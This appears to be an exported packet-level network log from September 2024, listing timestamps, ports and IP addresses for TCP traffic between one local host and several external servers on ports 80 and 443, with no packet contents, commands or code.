Sep 21, 2024 18:52:08.653901100 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653913021 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.653923988 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653954983 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.653975010 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.654550076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.654613018 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.654649019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.654655933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.654705048 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.654840946 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.654863119 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.654942989 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.654972076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655019999 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655026913 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655076027 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655152082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655175924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655205011 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655224085 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655227900 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655277014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655316114 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655327082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655364990 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655463934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655474901 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655486107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655518055 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655536890 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655539036 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655586958 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655587912 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655612946 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.655649900 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.655674934 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.656112909 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656164885 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656167030 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.656176090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656217098 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.656296968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656308889 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656320095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656330109 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656351089 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.656378984 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.656522036 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656533003 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656543016 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656554937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.656575918 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.656604052 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657097101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657135963 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657147884 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657149076 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657196045 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657228947 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657239914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657249928 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657280922 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657301903 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657450914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657460928 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657473087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657485008 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657495975 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657496929 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.657521963 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.657566071 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658055067 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658113003 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658123970 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658148050 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658189058 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658268929 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658279896 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658291101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658302069 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658319950 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658349991 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658420086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658492088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658512115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658550024 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658588886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658600092 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658617973 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658627033 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658693075 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658824921 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658835888 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658845901 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658857107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658869028 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658879995 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.658911943 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.658938885 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659096956 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659109116 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659117937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659154892 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659173965 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659233093 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659285069 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659416914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659427881 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659437895 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659450054 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659460068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659468889 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659472942 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659483910 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659493923 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659506083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659516096 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659522057 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659528017 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659538984 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.659554958 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.659588099 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660007954 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660018921 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660028934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660039902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660051107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660056114 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660063028 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660082102 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660108089 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660136938 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660387039 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660396099 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660408020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660418987 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660429001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660432100 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660439968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660449982 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660463095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660471916 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660511971 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660804987 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660816908 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660825968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660836935 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660846949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660864115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660873890 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660877943 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660888910 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660898924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660901070 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660916090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660923004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660929918 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660938978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.660938978 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660947084 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660953999 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660962105 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.660984993 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661011934 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661701918 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661712885 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661722898 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661736965 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661748886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661751986 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661761045 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661771059 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661777020 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661782980 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661792994 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661802053 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661804914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661815882 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661825895 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661829948 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661838055 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661849022 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661859989 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661860943 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.661883116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.661907911 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.662421942 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662434101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662442923 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662455082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662466049 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662473917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.662482977 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662492037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662493944 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662496090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662499905 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.662502050 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 21, 2024 18:52:08.662522078 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.662569046 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.678755999 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:08.678921938 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 21, 2024 18:52:09.219181061 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:09.219222069 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:09.219284058 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:09.219742060 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:09.219753981 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:10.052237988 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:10.052319050 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:10.074542046 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:10.074561119 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:10.076803923 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:10.076812029 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:10.390748978 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.390840054 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:10.391087055 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.392046928 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.392095089 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:10.870703936 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:10.871032000 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.873218060 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.873274088 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:10.873718023 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:10.925932884 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.938016891 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.938091040 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:10.938153982 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:11.157916069 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.158099890 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.158257008 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.158384085 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.158401966 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.159898996 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.159953117 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.160041094 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.160427094 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.160446882 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.337201118 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:11.337305069 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:11.337373018 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:11.339540005 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:11.339589119 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:11.339621067 CEST	49766	443	192.168.2.4	104.21.9.6
Sep 21, 2024 18:52:11.339637995 CEST	443	49766	104.21.9.6	192.168.2.4
Sep 21, 2024 18:52:11.358757019 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.358798981 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:11.358869076 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.359183073 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.359195948 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:11.967319965 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.967550039 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.968087912 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.968142986 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.970074892 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:11.970092058 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:11.981024027 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:11.981102943 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.982688904 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.982707977 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:11.983107090 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:11.984574080 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.984611988 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:11.984674931 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.404083014 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.404335976 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.404417038 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.404464960 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.404479980 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.404504061 CEST	49768	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.404510021 CEST	443	49768	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.420468092 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.420510054 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.420586109 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.420983076 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.421003103 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.689029932 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:12.689198971 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:12.689249992 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:12.689321995 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:12.689404964 CEST	49767	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:52:12.689448118 CEST	443	49767	116.203.165.127	192.168.2.4
Sep 21, 2024 18:52:12.710376024 CEST	49770	80	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:12.716340065 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.716413975 CEST	49770	80	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:12.716507912 CEST	49770	80	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:12.716545105 CEST	49770	80	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:12.722553015 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.722583055 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.723140955 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.723170042 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.723197937 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.724255085 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:12.910816908 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.910893917 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.912641048 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.912652016 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.913054943 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:12.914220095 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.914239883 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:12.914313078 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:13.445173025 CEST	80	49770	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:13.445283890 CEST	49770	80	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:13.445513964 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:13.445769072 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:13.445832968 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:13.445924997 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:13.445950031 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:13.445965052 CEST	49769	443	192.168.2.4	188.114.96.3
Sep 21, 2024 18:52:13.445972919 CEST	443	49769	188.114.96.3	192.168.2.4
Sep 21, 2024 18:52:13.448329926 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:13.448363066 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:13.448430061 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:13.448839903 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:13.448857069 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:13.465472937 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.465575933 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:13.465655088 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.466038942 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.466074944 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:13.950820923 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:13.950983047 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.953124046 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.953154087 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:13.953577042 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:13.954781055 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.954822063 CEST	49772	443	192.168.2.4	172.67.203.61
Sep 21, 2024 18:52:13.954888105 CEST	443	49772	172.67.203.61	192.168.2.4
Sep 21, 2024 18:52:14.188563108 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.188780069 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.193257093 CEST	49771	443	192.168.2.4	45.132.206.251
Sep 21, 2024 18:52:14.193272114 CEST	443	49771	45.132.206.251	192.168.2.4
Sep 21, 2024 18:52:14.193726063 CEST	443	49771	45.132.206.251	192.168.2.4
